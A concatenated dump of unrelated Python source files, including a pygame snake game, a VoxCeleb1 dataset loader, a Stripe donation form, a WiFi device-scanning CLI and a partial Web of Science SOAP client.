                self.state = self.screen.copy()
                return True
            elif event.type == KEYDOWN:
                # Android hardware back button pauses the game.
                # NOTE(review): for any other key, ``pressed`` keeps its
                # previous value (or is unbound on the first event) — confirm
                # this is intended.
                if event.key == pygame_sdl2.K_AC_BACK:
                    pressed = 'Pause'
            elif event.type == FINGERDOWN:
                pressed = self.pages[self.current_page].getButton(event.x, event.y)
            else:
                continue
            if pressed == 'Menu':
                self.pages['Confirm'] = Confirm(width, height, self.screen, self.screen.copy())
                self.changePage('Confirm')
            elif pressed == 'Pause':
                self.pages['Pause'] = Pause(width, height, self.screen, self.screen.copy())
                self.changePage('Pause')
            elif pressed == 'Up' and not python_flag:
                if self.game.snakes[0].changeDirection(3):
                    python_flag = True
            elif pressed == 'Down' and not python_flag:
                if self.game.snakes[0].changeDirection(1):
                    python_flag = True
            elif pressed == 'Left' and not python_flag:
                if self.game.snakes[0].changeDirection(2):
                    python_flag = True
            elif pressed == 'Right' and not python_flag:
                if self.game.snakes[0].changeDirection(0):
                    python_flag = True
            else:
                continue
        # Advance the game; a falsy return from updateSnakes ends the game.
        if not self.game.updateSnakes():
            self.pages['GameOver'] = GameOver(self.screen.get_width(), self.screen.get_height(), self.game, self.loadLeaderboard(self.game.fps), self.screen)
            self.changePage('GameOver')
        return True

    def handle(self):
        """Block on events for non-game pages and dispatch button presses.

        Returns False when the app should exit, True otherwise.
        """
        while True:
            event = pygame.event.wait()
            if event.type == QUIT:
                return False
            elif event.type == APP_TERMINATING:
                return False
            elif event.type == APP_WILLENTERBACKGROUND:
                self.state = self.screen.copy()
                return True
            elif event.type == APP_DIDENTERFOREGROUND:
                # Recreate the display and restore the pre-background snapshot.
                self.screen = pygame.display.set_mode((width, height), pygame.HWSURFACE)
                self.pages['Game'] = GameField(width, height, cell_size, self.screen)
                self.pages['Game'].game = self.game
                self.screen.blit(self.state, (0, 0))
                pygame.display.flip()
                return True
            elif event.type == KEYDOWN:
                # Android back button: leave the app from the menu, otherwise
                # navigate back to the menu.
                if event.key == pygame_sdl2.K_AC_BACK:
                    if self.current_page == 'Menu':
                        return False
                    else:
                        pressed = 'Menu'
                        break
            elif event.type == FINGERDOWN:
                pressed = self.pages[self.current_page].getButton(event.x, event.y)
                break
            else:
                continue
        if pressed == 'Single':
            self.game = Game(1, list(DIFFICULTY.values())[self.pages['Settings'].difficulty], self.pages['Settings'].controls)
            self.pages['Game'] = GameField(width, height, cell_size, self.screen)
            self.pages['Game'].game = self.game
            self.changePage('Game')
        elif pressed == 'Multi':
            # Two-player mode is not implemented yet; show placeholder page.
            self.pages['NotImplemented'] = NotImplementedPage(width, height, self.screen)
            self.changePage('NotImplemented')
        elif pressed == 'Settings':
            self.pages['Settings'] = Settings(width, height, self.screen)
            self.changePage('Settings')
        elif pressed == 'Leaderboard':
            self.pages['Leaderboard'] = Leaderboard(width, height, self.screen)
            self.pages['Leaderboard'].scores[DIFFICULTY['Easy']] = self.loadLeaderboard(DIFFICULTY['Easy'])
            self.pages['Leaderboard'].scores[DIFFICULTY['Normal']] = self.loadLeaderboard(DIFFICULTY['Normal'])
            self.pages['Leaderboard'].scores[DIFFICULTY['Hard']] = self.loadLeaderboard(DIFFICULTY['Hard'])
            self.changePage('Leaderboard')
        elif pressed == 'Difficulty':
            # Cycle through the three difficulties.
            self.pages['Settings'].difficulty = (self.pages['Settings'].difficulty + 1) % 3
        elif pressed == 'Controls':
            self.pages['Settings'].controls = (self.pages['Settings'].controls + 1) % len(CONTROLS)
        elif pressed == 'Sound':
            self.pages['Settings'].sound = not self.pages['Settings'].sound
            for sound in SOUNDS.values():
                sound.set_volume(1 if self.pages['Settings'].sound else 0)
        elif pressed == 'Music':
            self.pages['Settings'].music = not self.pages['Settings'].music
            pygame.mixer.music.set_volume(1 if self.pages['Settings'].music else 0)
        elif pressed == 'Menu':
            self.pages['Menu'] = Menu(width, height, self.screen)
            self.changePage('Menu')
        elif pressed == 'Unpause':
            self.changePage('Game')
        elif pressed == 'Yes':
            self.pages['Menu'] = Menu(width, height, self.screen)
            self.changePage('Menu')
        elif pressed == 'No':
            self.changePage('Game')
        elif pressed == 'Restart':
            self.game = self.game.restart()
            self.pages['Game'] = GameField(width, height, cell_size, self.screen)
            self.pages['Game'].game = self.game
            self.changePage('Game')
        elif pressed == 'Quit':
            return False
        else:
            # Tap hit no button: suppress the redundant redraw this cycle.
            self.update_flag = False
        return True

    def update(self):
        """Redraw the current page and flip the display buffer."""
        self.pages[self.current_page].update()
        pygame.display.flip()

    def playMusic(self, page):
        """Adjust background music for a transition to *page*.

        Transitions from (or to) Settings / NotImplemented / Leaderboard
        keep whatever is already playing.
        """
        if not self.current_page == 'Settings' and not self.current_page == 'NotImplemented' and not self.current_page == 'Leaderboard':
            if page == 'Game':
                if self.current_page == 'Pause':
                    pygame.mixer.music.unpause()
                else:
                    # Game music is keyed by the game's fps (the difficulty).
                    pygame.mixer.music.load(MUSIC[self.game.fps])
                    pygame.mixer.music.play(loops=-1)
            elif page == 'Pause':
                pygame.mixer.music.pause()
            elif not page == 'Settings' and not page == 'NotImplemented' and not page == 'Leaderboard':
                pygame.mixer.music.load(MUSIC[page])
                pygame.mixer.music.play(loops=-1)

    def loadLeaderboard(self, difficulty):
        """Read the saved scores for *difficulty*; [] when missing/corrupt.

        NOTE(review): the bare ``except`` masks every error (absent file,
        malformed line, unknown difficulty) and returns an empty list.
        """
        scores = []
        try:
            if difficulty == DIFFICULTY['Easy']:
                file = 'resources/.easy'
            elif difficulty == DIFFICULTY['Normal']:
                file = 'resources/.normal'
            elif difficulty == DIFFICULTY['Hard']:
                file = 'resources/.hard'
            with open(file, 'r') as f:
                for line in f:
                    scores.append(int(line.strip()))
        except:
            scores = []
        return scores

    def saveLeaderboard(self, scores, difficulty):
        """Write the top three *scores* for *difficulty* to its hidden file.

        NOTE(review): ``file`` (shadows a builtin) is unbound when
        *difficulty* matches none of the known values — confirm callers
        always pass one of DIFFICULTY's values.
        """
        if difficulty == DIFFICULTY['Easy']:
            file = 'resources/.easy'
        elif difficulty == DIFFICULTY['Normal']:
            file = 'resources/.normal'
        elif difficulty == DIFFICULTY['Hard']:
            file = 'resources/.hard'
        with open(file, 'w') as f:
            for s in scores[:3]:
                f.write(str(s) + '\n')
# Init
pygame.init()
pygame.display.set_caption('Python vs Android')
# Colors — RGB tuples; GREY carries a fourth alpha component so the
# translucent on-screen control buttons can be drawn over the game field.
BLACK = (0, 0, 0)
WHITE = (255, 255, 255)
GREY = (255, 255, 255, 80)
RED = (255, 0, 0)
GREEN = (0, 255, 0)
BLUE = (0, 0, 255)
YELLOW = (255, 255, 0)
CYAN = (0, 255, 255)
MAGENTA = (255, 0, 255)
# Color used to render each apple variant.
APPLE_COLORS = {
    AppleTypes.NORMAL : RED,
    AppleTypes.GOLDEN : YELLOW,
    AppleTypes.LIFE : MAGENTA,
    AppleTypes.SPECIAL : CYAN
}
# FPS per difficulty — the fps value doubles as the key into MUSIC and the
# per-difficulty leaderboard files.
DIFFICULTY = {
    'Easy' : 15,
    'Normal' : 25,
    'Hard': 35
}
# Control schemes selectable in Settings.
CONTROLS = ['Touch', 'Buttons', 'Inverted']
# Music per page / difficulty (None entries are pages that pause the music
# via UserInterface.playMusic rather than loading a track).
MUSIC = {
    'Menu' : 'resources/intro.wav',
    DIFFICULTY['Easy'] : 'resources/easy.wav',
    DIFFICULTY['Normal'] : 'resources/normal.wav',
    DIFFICULTY['Hard'] : 'resources/hard.wav',
    'Pause' : None,
    'Confirm' : None,
    'GameOver' : 'resources/game_over.wav'
}
# Sound effects, preloaded once at startup.
SOUNDS = {
    'Apple' : pygame.mixer.Sound('resources/apple.wav'),
    'Golden' : pygame.mixer.Sound('resources/golden.wav'),
    'Life' : pygame.mixer.Sound('resources/life.wav'),
    'Special' : pygame.mixer.Sound('resources/special.wav'),
    'Hit' : pygame.mixer.Sound('resources/hit.wav'),
}
# Tuning constants (alpha step per fade frame; lifetimes in frames).
ANIMATION_SPEED = 20
APPLE_EXPIRATION = 120
SNAKE_EXPIRATION = 40
SPECIAL_FRAMES = 3
# Adapt size to screen: fix 36 cells vertically, let the horizontal cell
# count follow the display's aspect ratio.
width = pygame.display.Info().current_w
height = pygame.display.Info().current_h
CELL_COUNT_Y = 36
cell_size = int(height / CELL_COUNT_Y)
CELL_COUNT_X = int(width / cell_size)
ui = UserInterface(width, height, cell_size)
ui.changePage('Menu')
running = True
# Main loop: handleGame() drives frames while playing; handle() blocks on
# events for every other page. Either returns False to request exit.
while running:
    if ui.current_page == 'Game':
        running = ui.handleGame()
    else:
        running = ui.handle()
        if ui.update_flag:
            ui.update()
        else:
            ui.update_flag = True
else:
    # while/else: runs once the loop condition becomes false (there is no
    # ``break`` above), persisting settings on exit.
    ui.pages['Settings'].saveSettings()
# Quit
pygame.quit()
| 2.9375 | 3 |
main.py | slimtomatillo/major_or_minor_song_classification | 8 | 12765102 | # Functions
from extract import extract
from model import model
import os
# Logging
import logging
logging.basicConfig(level=logging.INFO)
# Set directory
dir = '/Users/alexandrasmith/ds/metis/proj3_mcnulty/PROJ_FILES/major_or_minor_song_classification'
# filepath_to_music --> Edit as needed
filepath = 'sample_music_files'
# desired_clip_length --> Edit as needed (suggested: 30)
clip_sec = 30
# path_for_sliced_clips --> Edit as needed
export_path = 'sample_music_files_sliced'
def main(filepath_to_music, desired_clip_length, path_for_sliced_clips):
    """Run the end-to-end pipeline: feature extraction, modelling, export.

    Slices the music found under *filepath_to_music* into clips of
    *desired_clip_length* seconds (written to *path_for_sliced_clips*),
    extracts audio features into a DataFrame, trains the models, and writes
    three CSVs (data, model performance, holdout performance) into the
    module-level ``dir``.  The sliced-clips folder can be deleted once the
    data CSV has been exported.

    :param filepath_to_music: str — directory containing the source audio
    :param desired_clip_length: int — clip length in seconds (suggested: 30)
    :param path_for_sliced_clips: str — directory for the sliced clips
    :return: None; results are exported as CSV files
    """
    global dir
    logging.info('Extracting features...')
    # Extract audio features for every clip into a pandas DataFrame.
    data = extract(filepath_to_music, desired_clip_length, path_for_sliced_clips)
    logging.info('Done with extraction.')
    # makedirs(..., exist_ok=True) also creates missing parent directories
    # and avoids the check-then-create race of os.path.exists + os.mkdir.
    os.makedirs(dir, exist_ok=True)
    # Export dataframe as csv
    data.to_csv(os.path.join(dir, f'{desired_clip_length}_sec_data.csv'), index=False)
    logging.info('Data exported to csv.')
    logging.info('Building models...')
    # Train/evaluate models on the exported feature CSV.
    model_perf, holdout_perf = model(os.path.join(dir, f'{desired_clip_length}_sec_data.csv'))
    # Export dataframes of performance as csv
    model_perf.to_csv(os.path.join(dir, f'{desired_clip_length}_sec_performance.csv'), index=False)
    holdout_perf.to_csv(os.path.join(dir, f'{desired_clip_length}_sec_holdout.csv'), index=False)
    logging.info('Finished.')
    return
if __name__ == '__main__':
main(filepath, clip_sec, export_path)
| 3.046875 | 3 |
wagtail/core/signals.py | smartfactory-gmbh/wagtail | 8,851 | 12765103 | <reponame>smartfactory-gmbh/wagtail
from django.dispatch import Signal
# Module-level django Signal instances for Wagtail lifecycle events.
# The "provides args" comment on each signal documents the keyword
# arguments that senders pass when dispatching it.
# Page signals
# provides args: instance, revision
page_published = Signal()
# provides args: instance
page_unpublished = Signal()
# provides args: instance, parent_page_before, parent_page_after, url_path_before, url_path_after
pre_page_move = Signal()
# provides args: instance, parent_page_before, parent_page_after, url_path_before, url_path_after
post_page_move = Signal()
# Workflow signals
# provides args: instance, user
workflow_approved = Signal()
# provides args: instance, user
workflow_rejected = Signal()
# provides args: instance, user
workflow_cancelled = Signal()
# provides args: instance, user
workflow_submitted = Signal()
# Workflow task signals
# provides args: instance, user
task_approved = Signal()
# provides args: instance, user
task_rejected = Signal()
# provides args: instance, user
task_submitted = Signal()
# provides args: instance, user
task_cancelled = Signal()
# Locale signals
# Like pre_delete, but sent on deletion before on_delete validation is applied.
# Currently only sent by the Locale model.
# Required as a workaround for https://code.djangoproject.com/ticket/6870
# provides args: sender, instance
pre_validate_delete = Signal()
| 1.679688 | 2 |
setup.py | ojarva/flask-restful-url-generator | 3 | 12765104 | <filename>setup.py
"""
Packaging for flask-restful-url-generator
"""
from os import path
from codecs import open as codecs_open
from setuptools import setup
CURRENT_PATH = path.abspath(path.dirname(__file__))
with codecs_open(path.join(CURRENT_PATH, 'README.rst'), encoding='utf-8') as f:
LONG_DESCRIPTION = f.read()
setup(
name='flask_restful_url_generator',
version='0.0.1',
description='flask-restful URLs list',
long_description=LONG_DESCRIPTION,
url='https://github.com/ojarva/flask-restful-url-generator',
author='<NAME>',
author_email='<EMAIL>',
license='BSD',
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Intended Audience :: System Administrators',
'License :: OSI Approved :: BSD License',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: Implementation :: PyPy',
],
keywords='flask restful',
packages=["flask_restful_url_generator"],
install_requires=['flask_restful'],
extras_require={
'dev': ['twine', 'wheel'],
},
)
| 1.476563 | 1 |
sugar/data/voxceleb1.py | mechanicalsea/sugar | 4 | 12765105 | """
Description: Dataset from VoxCeleb1
Author: <NAME>
Date: 2020.11.26
VoxCeleb1:
- From iden_split.txt to the training and validation set.
- From iden_split.txt to evaulate the identification task.
- From veri_test2.txt, list_test_all2.txt, and list_test_hard2.txt to
evaluate the corresponding verification task.
File Directory: voxceleb1/{speaker_id}/{utterance_id}/*.wav
Indices List:
- Speaker Identification: iden_split.txt
- Speaker Verification: veri_test2.txt, list_test_hard2.txt, list_test_all2.txt
List Template:
- iden_split.txt
| 3 | id10003/na8-QEFmj44/00003.wav |
| 1 | id10003/tCq2LcKO6xY/00002.wav |
| 1 | id10003/K5zRxtXc27s/00001.wav |
- veri_test2.txt, list_test_hard2.txt, list_test_all2.txt
| 1 | id10001/Y8hIVOBuels/00001.wav | id10001/1zcIwhmdeo4/00001.wav |
| 0 | id10001/Y8hIVOBuels/00001.wav | id10943/vNCVj7yLWPU/00005.wav |
| 1 | id10001/Y8hIVOBuels/00001.wav | id10001/7w0IBEWc9Qw/00004.wav |
"""
import os
from sugar.database import Utterance
from sugar.database import VerificationTrials
__all__ = ['idenset', 'veriset', 'veritrain']
idenlist = '/workspace/datasets/voxceleb/Vox1/iden_split.txt'
rootdir = '/workspace/datasets/voxceleb/voxceleb1'
verilist = '/workspace/datasets/voxceleb/Vox1/veri_split.txt' # create as the official mentioned
veritest2 = '/workspace/datasets/voxceleb/Vox2/veri_test2.txt'
veriall2 = '/workspace/datasets/voxceleb/Vox2/list_test_all2.txt'
verihard2 = '/workspace/datasets/voxceleb/Vox2/list_test_hard2.txt'
def idenset(listfile=idenlist, rootdir=rootdir, read_func=None, num_samples=48000, num_eval=2, is_xvector=True):
    """Load the VoxCeleb1 identification splits from ``iden_split.txt``.

    Each line of *listfile* is ``"<split> <speaker>/<session>/<file>.wav"``
    where split is 1 (train), 2 (validation) or 3 (test).

    :param listfile: path to the identification split list
    :param rootdir: root directory prepended to every wav path
    :param read_func: kept for interface compatibility; only reported, not used
    :param num_samples: segment length in samples for train/val utterances
    :param num_eval: number of evaluation segments per test utterance
    :param is_xvector: if True, the test set is built with num_samples=0
        (full-length utterances), matching x-vector style evaluation

    Returns (train, val, test, spks): three ``Utterance`` datasets and a
    dict mapping speaker id -> integer label.
    """
    TRAIN_TYPE, VAL_TYPE, TEST_TYPE = 1, 2, 3
    datalst = []
    spks = []
    with open(listfile, 'r') as f:
        # Iterate lines directly; skip blank lines instead of crashing on
        # an unexpected trailing newline (the old manual readline loop
        # would raise on ``line.split(' ')`` for an empty line).
        for line in f:
            line = line.strip()
            if not line:
                continue
            split_type, wav_path = line.split(' ')
            spks.append(wav_path.split('/')[0])
            datalst.append([int(split_type), os.path.join(rootdir, wav_path)])
    # Stable speaker-id -> label mapping (sorted for reproducibility).
    spks = {spk: idx for idx, spk in enumerate(sorted(set(spks)))}
    print('The "read" method of dataset is', read_func)
    # Partition by split type.
    trainlst = [wav for t, wav in datalst if t == TRAIN_TYPE]
    vallst = [wav for t, wav in datalst if t == VAL_TYPE]
    testlst = [wav for t, wav in datalst if t == TEST_TYPE]
    # Convert lists to Utterance datasets.
    train = Utterance(trainlst, num_samples)
    val = Utterance(vallst, num_samples)
    test = Utterance(testlst, num_samples if not is_xvector else 0, True, num_eval)
    return train, val, test, spks
def veriset(test2=veritest2, all2=veriall2, hard2=verihard2, rootdir=rootdir, num_samples=48000, num_eval=2):
    """Load the VoxCeleb1 verification test trials.

    1. veri_test2.txt      -> Vox1-O trials (always loaded),
    2. list_test_all2.txt  -> Vox1-E trials (optional),
    3. list_test_hard2.txt -> Vox1-H trials (optional).
    All lists share the same *rootdir*.

    Returns (veri_test2, veri_all2, veri_hard2, wav_files): the three
    trial datasets (None when the list file is missing) plus a single
    ``Utterance`` over the union of the wav files they reference.

    Notes: by try-and-error, 2 x 5-second segments works well within
    20 seconds of audio.
    """
    def load_trials(path):
        # Optional lists may be None or absent on disk.
        if path is None or not os.path.exists(path):
            return None
        return VerificationTrials(path, num_samples, True, num_eval, rootdir)

    veri_test2 = VerificationTrials(test2, num_samples, True, num_eval, rootdir)
    veri_hard2 = load_trials(hard2)
    veri_all2 = load_trials(all2)
    # Deduplicate wav paths across all loaded trial lists.
    unique_files = set()
    for trials in (veri_test2, veri_hard2, veri_all2):
        if trials is not None:
            unique_files.update(trials.files)
    wav_files = Utterance(list(unique_files), num_samples, True, num_eval)
    return veri_test2, veri_all2, veri_hard2, wav_files
def veritrain(listfile=verilist, rootdir=rootdir, num_samples=48000):
    """Load the verification training split (train set + speaker dict).

    Bug fix: ``num_samples`` was previously passed positionally into
    ``idenset``'s third parameter (``read_func``), so the requested segment
    length was silently ignored and the default (48000) always used; it is
    now passed by keyword.
    """
    train, _, _, spks = idenset(listfile, rootdir, num_samples=num_samples)
    return train, spks
if __name__ == '__main__':
    # Smoke test: load all trial lists and report corpus statistics.
    # NOTE(review): assumes list_test_all2.txt / list_test_hard2.txt both
    # exist on disk — veriset() returns None for a missing list, which
    # would make the attribute accesses below raise. Confirm before use.
    veri_test2, veri_all2, veri_hard2, wav_files = veriset()
    print('# of utterances in Vox1-O: {:,}'.format(len(veri_test2.files)))
    print('# of utterances in Vox1-E: {:,}'.format(len(veri_all2.files)))
    print('# of utterances in Vox1-H: {:,}'.format(len(veri_hard2.files)))
    print('# of utterances in Vox1-E/H: {:,}'.format(len(set(veri_all2.files) | set(veri_hard2.files))))
    # Speaker id is the third-from-last path component (.../spk/session/file.wav).
    print('# of speakers in Vox1-O: {:,}'.format(len(set([utt.split('/')[-3] for utt in veri_test2.files]))))
    print('# of speakers in Vox1-E: {:,}'.format(len(set([utt.split('/')[-3] for utt in veri_all2.files]))))
    print('# of speakers in Vox1-H: {:,}'.format(len(set([utt.split('/')[-3] for utt in veri_hard2.files]))))
    print('# of speakers in Vox1-E/H: {:,}'.format(len(set([utt.split('/')[-3] for utt in veri_all2.files]) | \
        set([utt.split('/')[-3] for utt in veri_hard2.files]))))
    print(1)
| 1.773438 | 2 |
readthedocs/donate/forms.py | ardalis/readthedocs.org | 1 | 12765106 | import logging
from django import forms
from django.conf import settings
from django.utils.translation import ugettext_lazy as _
import stripe
from .models import Supporter
log = logging.getLogger(__name__)
class SupporterForm(forms.ModelForm):
    """Donation form: collects supporter details and charges the card.

    The Stripe charge happens inside ``clean`` (noted as "not ideal" in the
    original code) so that a declined card surfaces as a normal form
    validation error.
    """

    class Meta:
        model = Supporter
        fields = (
            'last_4_digits',
            'stripe_id',
            'name',
            'email',
            'dollars',
            'logo_url',
            'site_url',
            'public',
        )
        labels = {
            'public': _('Make this donation public'),
        }
        # NOTE(review): the dollars help text says "over $400", but clean()
        # drops logo/site URLs below a $200 threshold — confirm which amount
        # is intended before changing either.
        help_texts = {
            'public': _('Your name and image will be displayed on the donation page'),
            'email': _('Your email is used for Gravatar and so we can send you a receipt'),
            'logo_url': _("URL of your company's logo, images should be 300x300 pixels or less"),
            'dollars': _('Companies donating over $400 can specify a logo URL and site link'),
        }
        widgets = {
            'dollars': forms.Select(attrs={
                'data-bind': 'value: dollars'
            }),
            'logo_url': forms.TextInput(attrs={
                'data-bind': 'value: logo_url, enable: urls_enabled'
            }),
            'site_url': forms.TextInput(attrs={
                'data-bind': 'value: site_url, enable: urls_enabled'
            })
        }

    # Card details are filled in client-side by Stripe.js and posted hidden.
    last_4_digits = forms.CharField(widget=forms.HiddenInput(), required=True)
    stripe_id = forms.CharField(widget=forms.HiddenInput(), required=True)

    def __init__(self, *args, **kwargs):
        # The view must pass the (possibly anonymous) requesting user.
        self.user = kwargs.pop('user')
        super(SupporterForm, self).__init__(*args, **kwargs)

    def clean(self):
        """Call stripe for payment (not ideal here) and clean up logo < $200."""
        dollars = self.cleaned_data['dollars']
        if dollars < 200:
            self.cleaned_data['logo_url'] = None
            self.cleaned_data['site_url'] = None
        try:
            stripe.api_key = settings.STRIPE_SECRET
            # Stripe amounts are in cents.
            stripe.Charge.create(
                amount=int(self.cleaned_data['dollars']) * 100,
                currency='usd',
                source=self.cleaned_data['stripe_id'],
                description='Read the Docs Sustained Engineering',
                receipt_email=self.cleaned_data['email']
            )
        except stripe.error.CardError as e:
            # Fixed: the old "except CardError, e:" form is Python-2-only
            # syntax and a SyntaxError on Python 3; "as e" works on both.
            stripe_error = e.json_body['error']
            log.error('Credit card error: %s', stripe_error['message'])
            raise forms.ValidationError(
                _('There was a problem processing your card: %(message)s'),
                params=stripe_error)
        return self.cleaned_data

    def save(self, commit=True):
        """Save the Supporter, attaching the authenticated user if any."""
        supporter = super(SupporterForm, self).save(commit)
        if commit and self.user is not None and self.user.is_authenticated():
            supporter.user = self.user
            supporter.save()
        return supporter
| 2.171875 | 2 |
src/who_is_on_my_wifi.py | tucnakomet1/Python-Who-Is-On-My-WiFi | 19 | 12765107 | from scapy.all import *
from device import *
from who import *
import who_is_on_my_wifi
import subprocess
import argparse
import textwrap
import platform
import inspect
import socket
import getmac
import sys
import os
if platform.system() == "Windows":
import wmi
def contact():
    """Print the author's contact details (gmail and GitHub) to stdout."""
    details = """
    >>>> Contact <<<<
    My Gmail: <EMAIL>
    My GitHub: https://github.com/tucnakomet1/
    """
    print(details)
def license():
    """Fetch the MIT license text from the project's GitHub repo and print it.

    Requires network access. NOTE(review): shadows the builtin ``license``
    (kept — it is part of this module's public API), and relies on
    ``urllib.request`` being in scope via the wildcard ``from scapy.all
    import *`` import — this module does not import urllib directly; confirm.
    """
    lic_url = "https://raw.githubusercontent.com/tucnakomet1/Python-Who-Is-On-My-WiFi/master/LICENSE.txt"
    lic = urllib.request.urlopen(lic_url)
    lic = lic.read().decode("utf-8")
    print(lic)
def help():
    """Print the module's help page; colorized (ANSI escapes) on Linux,
    plain text elsewhere. NOTE(review): shadows the builtin ``help`` —
    kept, as it is part of this module's public API.
    """
    # ANSI escape codes for colors / emphasis; END resets formatting.
    PURPLE, CYAN, DARKCYAN, BLUE, GREEN, YELLOW, RED, BOLD, UNDER, END = '\033[95m', '\033[96m', '\033[36m', '\033[94m', '\033[92m', '\033[93m', '\033[91m', '\033[1m', '\033[4m', '\033[0m'
    if platform.system() == "Linux":
        print(f"""
{UNDER}>>>> Welcome to wiom help page! What's wrong? <<<<{END}
--version | 1.3.0
{UNDER}{BOLD}About:{END}
Who-Is-On-My-WIFi module help you to find who is stealing your WiFI network, scan your WiFI and show you how many devices are currently connected.
{UNDER}{BOLD}Usage:{END}
{RED}>>> {YELLOW}import {CYAN}who_is_on_my_wifi{END}
{RED}>>> {CYAN}who_is_on_my_wifi{END}.{GREEN}help(){END} {BOLD}{RED}# show this help page{END}
{RED}>>> {CYAN}who_is_on_my_wifi{END}.{GREEN}contact(){END} {BOLD}{RED}# show contact{END}
{RED}>>> {CYAN}who_is_on_my_wifi{END}.{GREEN}license(){END} {BOLD}{RED}# show license{END}
{RED}>>> {CYAN}who_is_on_my_wifi{END}.{GREEN}who(n){END} {BOLD}{RED}# see who is on my wifi (int('n') is scanning time - optional; default is 10){END}
{RED}>>> {CYAN}who_is_on_my_wifi{END}.{GREEN}device(){END} {BOLD}{RED}# see information about your device
{UNDER}{BOLD}CONTACT:{END}
{UNDER}My Gmail:{END} <EMAIL>
{UNDER}My GitHub:{END} https://github.com/tucnakomet1/
{CYAN}who_is_on_my_wifi{END}.{GREEN}contact(){END}
{UNDER}{BOLD}License:{END}
MIT License
{UNDER}You can see{END} → {CYAN}who_is_on_my_wifi{END}.{GREEN}license(){RED}{END}
→ https://github.com/tucnakomet1/Python-Who-Is-On-My-WiFi/blob/master/LICENSE.txt
""")
    else:
        # Plain (non-ANSI) variant for Windows and other platforms.
        print(f"""
>>>> Welcome to help page! What's wrong? <<<<
--version | 1.3.0
About:
Who-Is-On-My-WIFi module help you to find who is stealing your WiFI network, scan your WiFI and show you how many devices are currently connected.
Usage:
>>> import who_is_on_my_wifi
>>> who_is_on_my_wifi.help() # show this help page
>>> who_is_on_my_wifi.contact() # show contact
>>> who_is_on_my_wifi.license() # show license
>>> who_is_on_my_wifi.who(n) # see who is on my wifi (int('n') is scanning time - optional; default is 10)
>>> who_is_on_my_wifi.device() # see information about your device
CONTACT:
My Gmail: <EMAIL>
My GitHub: https://github.com/tucnakomet1/
who_is_on_my_wifi.contact()
License:
MIT License
You can see → who_is_on_my_wifi.license()
→ https://github.com/tucnakomet1/Python-Who-Is-On-My-WiFi/blob/master/LICENSE.txt
""")
def main():
    """Command-line entry point: parse arguments and dispatch to the
    device()/who()/contact() helpers.

    Bug fix: the f-string placeholder for the WiFi password had been
    corrupted to ``{<PASSWORD>]}`` (a SyntaxError that made the module
    un-importable); restored to ``{dev[11]}``, consistent with the
    surrounding ``dev[10]`` / ``dev[12]`` fields.
    """
    wrapper = textwrap.TextWrapper(width=70)
    string = wrapper.fill(text="Who-Is-On-My-WIFi")
    parser = argparse.ArgumentParser(formatter_class=argparse.RawTextHelpFormatter, description=string, epilog=textwrap.dedent("""
        Thank you!
        ↓ ↓ ↓ ↓
        Visit my GitHub: https://github.com/tucnakomet1
        """))
    parser.add_argument(
        '-v', '--version',
        action='version',
        version='%(prog)s 1.3.0',
        help='show current version')
    parser.add_argument(
        '-c', '--contact',
        action='store_true',
        help='show contact')
    parser.add_argument(
        '-d', '--device',
        action="store_true",
        help='show information about your device')
    parser.add_argument(
        '-w', '--who',
        action="store_true",
        required=False,
        help='show who is on your WiFi!')
    parser.add_argument(
        "-t", "--time",
        type=int,
        metavar="",
        required=False,
        default=10,
        help="int supplement for '-w' command (scanning '-t' seconds)")
    args = parser.parse_args()
    if args.device:
        # device() returns a fixed-order sequence of device/network fields.
        dev = device()
        print(f"""
PC Name: {dev[0]}
PC Product-Name: {dev[1]}
MAC Address: {dev[2]}
IP Address (host): {dev[3]}
IP Address: {dev[4]}
Public IP: {dev[5]}
PC HostName: {dev[6]}
WiFi Name: {dev[7]}
Gateway: {dev[8]}
DNS 1: {dev[9]}
DNS 2: {dev[10]}
Password: {dev[11]}
Security: {dev[12]}
Interface: {dev[13]}
Frequency: {dev[14]}
Signal: {dev[15]}
Channel: {dev[16]}
Country: {dev[17]}
Region: {dev[18]}
City: {dev[19]}
Zip Code: {dev[20]}
Latitude: {dev[21]}
Longitude: {dev[22]}
ISP: {dev[23]}
""")
    if args.who:
        # NOTE(review): --time defaults to 10, so this branch only falls
        # through to who() when "-t 0" is passed explicitly — confirm intended.
        if args.time:
            WHO = who(args.time)
        else:
            WHO = who()
        # Each entry is a 6-field record printed as three "key value" lines.
        for j in range(0, len(WHO)):
            comm = f"\n{WHO[j][0]} {WHO[j][1]}\n{WHO[j][2]} {WHO[j][3]}\n{WHO[j][4]} {WHO[j][5]}\n"
            print(comm)
    if args.contact:
        contact()
    # With no arguments at all, show usage instead of doing nothing.
    if len(sys.argv) == 1:
        parser.print_help()
if __name__ == "__main__":
main()
| 2.71875 | 3 |
wos/client.py | ConnectedSystems/wos | 0 | 12765108 | <filename>wos/client.py
#!/usr/bin/env python
__all__ = ['WosClient']
import suds as _suds
import functools as _functools
from base64 import b64encode as _b64encode
from collections import OrderedDict as _OrderedDict
from limit import limit as _limit
class WosClient():
"""Query the Web of Science.
You must provide user and password only to user premium WWS service.
with WosClient() as wos:
results = wos.search(...)"""
base_url = 'http://search.webofknowledge.com'
auth_url = base_url + '/esti/wokmws/ws/WOKMWSAuthenticate?wsdl'
search_url = base_url + '/esti/wokmws/ws/WokSearch?wsdl'
searchlite_url = base_url + '/esti/wokmws/ws/WokSearchLite?wsdl'
def __init__(self, user=None, password=<PASSWORD>, SID=None, close_on_exit=True,
lite=False, proxy=None, timeout=600, throttle=(2, 1)):
"""Create the SOAP clients. user and password for premium access."""
self._SID = SID
self._lite = lite
self._close_on_exit = close_on_exit
proxy = {'http': proxy} if proxy else None
options = {'proxy': proxy, 'timeout': timeout}
search_wsdl = self.searchlite_url if lite else self.search_url
self._auth = _suds.client.Client(self.auth_url, **options)
self._search = _suds.client.Client(search_wsdl, **options)
self._throttle_wait = _limit(*throttle)(lambda: True)
if user and password:
auth = '%s:%s' % (user, password)
auth = _b64encode(auth.encode('utf-8')).decode('utf-8')
headers = {'Authorization': ('Basic %s' % auth).strip()}
self._auth.set_options(headers=headers)
def __enter__(self):
"""Automatically connect when used with 'with' statements."""
self.connect()
return self
def __exit__(self, exc_type, exc_value, traceback):
"""Close connection after closing the 'with' statement."""
if self._close_on_exit:
self.close()
def __del__(self):
"""Close connection when deleting the object."""
if self._close_on_exit:
self.close()
def _api(fn):
"""API decorator for common tests (sessions open, etc.) and throttle
limitation (calls per second)."""
@_functools.wraps(fn)
def _fn(self, *args, **kwargs):
self._throttle_wait()
